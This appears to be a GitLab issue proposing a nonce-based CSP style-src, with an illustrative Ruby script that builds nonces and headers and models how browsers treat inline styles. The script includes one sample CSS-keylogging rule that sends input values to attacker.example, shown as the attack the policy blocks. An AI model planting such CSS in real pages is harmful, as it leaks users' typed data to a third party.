Replace 'self' and 'unsafe-inline' in the CSP's style-src with a nonce
Proposal
This is low priority compared to the rest of the CSP improvements, but we can replace `'self'` and `'unsafe-inline'` in the CSP's `style-src` with a per-response nonce. This would help mitigate CSS injection (and the associated risks like keylogging), since an injected `<style>` element that does not carry the matching nonce is refused by the browser.
The work for this would also include making sure all our styles have nonces. I'm expecting it can be done in a similar way as !48093 (merged).
I tested locally and `link` and `style` support the `nonce` attribute and it works even in Safari.
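As an added illustration of the proposal (example code written for this page, not GitLab's own implementation or the code in !48093), the following stand-alone Ruby shows the weak `style-src` beside the nonce-based one, the per-response nonce generation, tag helpers that attach the nonce to `<link>` and `<style>`, and a small model of how a CSP-aware browser decides whether an inline style is applied. The policy strings, helper names and the injected CSS payload are constructed for the example.

```ruby
require 'securerandom'

# Constructed "before" directive: 'unsafe-inline' lets any injected <style> apply.
WEAK_STYLE_SRC = "style-src 'self' 'unsafe-inline' https://assets.example"

# One nonce per HTTP response: 128 bits from a CSPRNG, base64-encoded (24 chars).
# A nonce that is reused across responses or guessable defeats the whole scheme.
def generate_style_nonce
  SecureRandom.base64(16)
end

# "After" directive: only elements carrying this exact nonce may supply CSS.
def hardened_style_src(nonce)
  "style-src 'nonce-#{nonce}'"
end

# Full header value for the response that the nonce belongs to.
def build_csp(nonce)
  ["default-src 'self'", hardened_style_src(nonce)].join('; ')
end

# Tag helpers: the same nonce must be stamped on every <link> and <style>
# the page emits, otherwise that stylesheet is dropped once 'self' is gone.
def stylesheet_link_tag(href, nonce)
  %(<link rel="stylesheet" href="#{href}" nonce="#{nonce}">)
end

def inline_style_tag(css, nonce)
  %(<style nonce="#{nonce}">#{css}</style>)
end

# Parse "directive sources; directive sources" into { name => [sources] }.
def parse_csp(header)
  header.split(';').map(&:strip).reject(&:empty?).each_with_object({}) do |directive, acc|
    name, *sources = directive.split(/\s+/)
    acc[name] = sources
  end
end

# Model of the browser's decision for an inline <style> element under CSP3:
#  - allowed if the element's nonce matches a 'nonce-...' source;
#  - otherwise allowed only by 'unsafe-inline', which browsers ignore as soon
#    as the directive contains any nonce or hash source;
#  - blocked in every other case.
def inline_style_allowed?(header, element_nonce)
  policy = parse_csp(header)
  sources = policy['style-src'] || policy['default-src'] || []
  nonces = sources.select { |s| s.start_with?("'nonce-") }.map { |s| s[7..-2] }
  return true if element_nonce && nonces.include?(element_nonce)

  has_nonce_or_hash = sources.any? do |s|
    s.start_with?("'nonce-", "'sha256-", "'sha384-", "'sha512-")
  end
  sources.include?("'unsafe-inline'") && !has_nonce_or_hash
end

if __FILE__ == $PROGRAM_NAME
  nonce = generate_style_nonce
  csp = build_csp(nonce)
  puts "Content-Security-Policy: #{csp}"
  puts stylesheet_link_tag('/assets/application.css', nonce)
  puts inline_style_tag('body { margin: 0 }', nonce)

  # Constructed CSS-injection payload: an attribute-selector rule of the kind
  # used for CSS keylogging. It lands in the page without the nonce.
  injected = "input[value^='a'] { background: url(https://attacker.example/a) }"
  puts "injected style applied under weak policy:     #{inline_style_allowed?(WEAK_STYLE_SRC, nil)}"
  puts "injected style applied under hardened policy: #{inline_style_allowed?(csp, nil)}"
  puts "legitimate nonced style under hardened policy: #{inline_style_allowed?(csp, nonce)}"
  puts injected
end
```

In a Rails application the same plumbing is normally provided by `config.content_security_policy_nonce_generator` together with `config.content_security_policy_nonce_directives` listing `style-src`; the helpers above are deliberately framework-free so the decision logic can be read and run on its own. Note that the nonce covers `<link>` and `<style>` elements only; inline `style="..."` attributes are not nonce-able and need a separate plan.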
Edited by Dominic Couture